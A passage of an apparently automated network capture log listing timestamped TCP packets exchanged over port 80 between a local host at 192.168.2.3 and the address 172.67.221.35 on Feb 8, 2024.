                                                                                                                                                                    Feb 8, 2024 19:08:49.581568003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581579924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581592083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581604004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581614017 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.581614971 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581626892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581644058 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.581661940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.582387924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582468987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582483053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582494020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582505941 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582511902 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.582520008 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582531929 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.582535028 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.582561970 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.583390951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583405972 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583417892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583436012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583447933 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.583448887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583460093 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.583461046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583476067 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.583493948 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.583513021 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.584261894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584276915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584342003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.584353924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584367037 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584378958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584392071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584398031 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.584407091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.584429026 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.585248947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585263014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585275888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585289001 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585302114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585303068 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.585315943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585330009 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.585340977 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.585376978 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.586108923 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586200953 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586215973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586249113 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.586272001 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586286068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586299896 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586313009 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586313009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.586327076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.586338997 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.586366892 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.587215900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587229967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587243080 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587255955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587286949 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587296009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.587301970 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587313890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.587320089 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.587347984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.588115931 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588129997 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588143110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588156939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588171005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588171005 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.588184118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588197947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.588203907 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.588232994 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589040995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589055061 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589066982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589082003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589095116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589107990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589117050 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589123011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589143991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589168072 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589823961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589838982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589854956 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589875937 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589903116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589906931 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589926958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589940071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589952946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.589971066 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.589991093 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.590728045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590744972 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590784073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590799093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590811014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590814114 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.590823889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590837002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.590845108 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.590872049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.591644049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591658115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591670990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591685057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591696978 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.591696978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591710091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591722965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.591728926 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.591756105 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.591773033 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.592482090 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592494965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592545033 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.592576981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592591047 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592605114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592617035 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592628956 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.592633009 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.592657089 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.593461037 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593476057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593487978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593502045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593516111 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.593523026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593533993 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.593539000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593554020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.593566895 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.593612909 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.594238997 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594253063 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594289064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594300985 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.594304085 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594316006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594329119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594342947 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.594355106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.594368935 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.595105886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595154047 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.595316887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595330954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595345974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595360994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595371008 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.595374107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595386982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595401049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.595403910 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.595422029 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.596102953 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596117973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596131086 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596164942 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.596196890 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.596215963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596230984 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596242905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596257925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.596267939 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.596295118 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.597003937 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597018957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597062111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597063065 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.597075939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597088099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597101927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597116947 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.597126007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597151041 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.597953081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597966909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597980022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.597994089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598004103 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598007917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598025084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598028898 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598038912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598057032 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598077059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598750114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598763943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598803043 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598818064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598825932 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598830938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598845005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598859072 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.598870039 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.598885059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.599603891 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599637985 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599652052 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.599652052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599694967 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.599714994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599730015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599742889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599756956 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.599767923 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.599798918 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.600486994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600569963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600584030 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600596905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600610971 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600613117 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.600625038 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600636959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.600637913 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.600672007 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.601417065 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601429939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601442099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601455927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601465940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.601469994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601483107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601495981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.601506948 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.601536989 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.602248907 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602262974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602277040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602333069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.602344036 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602356911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602370977 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602382898 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.602384090 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.602411032 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.603101969 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603157997 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.603171110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603184938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603198051 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603219986 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.603251934 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603266001 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603279114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.603296995 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.603324890 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.604036093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604089975 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604104996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604135990 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.604168892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604182959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604208946 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.604212999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604227066 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604259014 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.604270935 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.604310036 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605052948 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605067968 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605078936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605092049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605106115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605117083 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605119944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605135918 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605140924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605166912 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605842113 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605891943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605897903 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605906963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605918884 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605932951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605946064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605950117 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.605961084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.605967045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.606005907 CET4971780192.168.2.3172.67.221.35
